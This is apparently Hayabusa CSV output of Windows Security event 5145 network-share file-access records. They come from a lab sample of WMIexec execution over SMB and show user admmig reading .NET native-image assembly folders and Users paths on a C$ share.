2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W0bb5dac4#\eff9f99a173bfe23d56129e79f85e220 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.063 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2bac6884# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.063 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2bac6884#\98fa0075b3677ec2d6a5e980c8c194e2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d29a719# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d29a719#\b04af69b54fb462c4c632d0f508d617b | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d6979e4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d6979e4#\b77a61cdfca8e3f67916586b89eb6df5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2ded559f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2ded559f#\2cbdedd1fc5676a39a1fb1b534f48d02 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W3cdb5602# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W3cdb5602#\e3e82e97635cdd0d33dd1fb39ffe5b5f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6c95e797# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6c95e797#\4bdb448dffd981eb795d0efeaf81aee9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6dcfceb1# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6dcfceb1#\bbfc6bc472afc457c523dc2738248629 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W7b7c0837# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W7b7c0837#\294124bd4523f5af19788c4942aeba5e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e7db7c5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e7db7c5#\e9ab45e2a1806140421e99300db14933 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e8926d3# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e8926d3#\278d9be2765837ed33460677146f35e8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W15cd0137# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W15cd0137#\82f3f76602a3738000b03df08a71ffe8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W37d1a032# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W37d1a032#\d3293b74965baef61a05323c7ec98d92 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W39c436dd# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W39c436dd#\711dbd144f8f71a864ea8493a3877bc5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W69ef49d2# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W69ef49d2#\28242ebb69175640e01f44f44845482c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.191 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W71daf281# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W71daf281#\be26a3df8bcf20be912896fba8462d2f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W81a3882f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W81a3882f#\84ae811d9df57eca1c9728263a6e6aff | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W708fc392# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W708fc392#\4f9e41de8acf7fe60bc43242811fbabd | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W5052cbb1# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W5052cbb1#\960951a3fe97e1a2bd2d09ced71ce4f3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W57798b05# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W57798b05#\2145d62276d37b22799a8deb8d44b210 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W73044bb5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W73044bb5#\fb97af1f4b1eed42372eea20ba746a53 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W193497eb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W193497eb#\a26561bad24a68eb0217aa9d9fdad386 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W08054466# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W08054466#\50e266485611719e095733dd021e3a42 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad38fd8b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad38fd8b#\44e2747436ee8621f4daf918b1922498 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad78daf4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
